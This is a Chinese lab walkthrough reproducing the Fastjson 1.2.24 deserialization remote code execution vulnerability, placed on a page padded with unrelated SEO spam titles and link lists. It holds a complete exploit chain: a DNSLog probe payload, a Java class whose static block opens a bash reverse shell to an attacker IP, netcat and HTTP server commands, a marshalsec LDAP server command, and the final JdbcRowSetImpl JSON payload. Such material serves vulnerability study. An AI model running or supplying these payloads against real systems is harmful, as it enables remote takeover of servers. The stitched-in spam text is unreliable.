当前位置: 首页 > news >正文

如何做网站联盟网站友链查询接口

如何做网站联盟,网站友链查询接口,ajaxjsp网站开发从入门到精通,eclipes 网站开发漏洞复现环境搭建请参考 http://t.csdnimg.cn/vSaaw kali切换jdk版本请参考 Kali安装JAVA8和切换JDK版本的详细过程_kali安装jdk8-CSDN博客 漏洞原理 Fastjson提供的com.sun.rowset.JdbcRowSetImpl类下的dataSourceName方法支持传入一个RMI/LDAP源,支持远程调用。…

漏洞复现环境搭建请参考

http://t.csdnimg.cn/vSaaw

kali切换jdk版本请参考

Kali安装JAVA8和切换JDK版本的详细过程_kali安装jdk8-CSDN博客

漏洞原理

Fastjson提供的com.sun.rowset.JdbcRowSetImpl类下的dataSourceName方法支持传入一个RMI/LDAP源,支持远程调用。攻击者只需要创建一个恶意指令类(写入反弹shell等恶意命令),设置RMI/LDAP服务的远程加载指向该恶意类,即可做到远程任意命令执行

漏洞版本

fastjson<=1.2.24

漏洞验证

(1)Web访问,JSON页面

(2)BP抓包,利用DNS回显验证,DNSLog Platform

(3)修改提交方式为POST,加入以下内容,放包,DNS回显则证明漏洞存在

#val的值为DNS申请的域名Content-Type:application/json{"a":{"@type":"java.net.Inet4Address","val":"q6teka.dnslog.cn"}
}

漏洞利用

(1)创建远程加载类,攻击机创建.java文件,内容如下,并进行java编译生成class文件

#执行反弹shell,注意文件名需要和class类名称创建的一样
import java.lang.Runtime;
import java.lang.Process;public class getshell {static {try {Runtime rt = Runtime.getRuntime();String[] commands = {"bash", "-c", "bash -i >& /dev/tcp/192.168.88.128/8888 0>&1"};Process pc = rt.exec(commands);pc.waitFor();} catch (Exception e) {// do nothing}}
}

(2)开启攻击机HTTP服务和反弹shell端口的监听

python3 -m http.server 80
nc -lvvp 8888

(3)开启LDAP服务

#工具获取
git clone https://github.com/RandomRobbieBF/marshalsec-jar#开启LADP服务,端口6666,指定远程加载类为攻击机上的getshell
java -cp marshalsec-0.0.3-SNAPSHOT-all.jar marshalsec.jndi.LDAPRefServer http://192.168.88.128:80/#getshell 6666      

(4)回到站点,BP抓包,发送恶意数据,内容如下

Content-Type:application/json
{"b":{"@type":"com.sun.rowset.JdbcRowSetImpl","dataSourceName":"ldap://192.168.88.128:6666/getshell","autoCommit":true}
}

(5)放包,getshell

http://www.bjxfkj.com.cn/article/102585.html

相关文章:

  • 网站平台建设调研报告站长之家是什么网站
  • 我做服装设计师的 求推荐资源网站微商软文范例
  • 企业营销网站服务器1g够学it什么培训机构好
  • 模板网站哪家靠谱岳阳网站建设推广
  • 网站排名的重要性百度指数排名
  • 香港特别行政区区徽平台seo什么意思
  • 上海龙雨建设工程有限公司网站百度电话客服24小时人工
  • ps做的网页怎么导入网站毕节地seo
  • 有没有专业做电视测评的网站阿里域名注册官网
  • 公司网站建设入哪科目2023年最新新闻摘抄
  • 中山制作网站的公司seo关键词排名优化怎样收费
  • 电商营业执照网上申请四川企业seo推广
  • 建设工程造价信息网站外贸seo软件
  • 想推网站目录源码seo资讯
  • 苏州微信网站建设seo技术培训教程
  • 建设一个门户网站seo发包排名软件
  • 做任务赚钱的网站源码seo实战视频
  • 桥南做网站一个网站推广
  • 做进出口外贸网站市场监督管理局职责
  • 网站开发流程 图书网站百度不收录的原因
  • 设计模板网站长春网站制作系统
  • wordpress 下一页北京网站优化策略
  • 网站用什么语言编写知道百度
  • 网站制作的网站开发成都网站优化排名
  • emlog做企业网站常用的营销策略
  • 使用什么工具什么步骤完成网站的设计与建设杭州关键词排名工具
  • 在网上做游戏网站违法吗seo服务外包费用
  • win7怎么做网站域名绑定网站的seo是什么意思
  • 在长沙阳光医院做网站编辑著名的营销成功的案例
  • 济南网站制作平台今日深圳新闻最新消息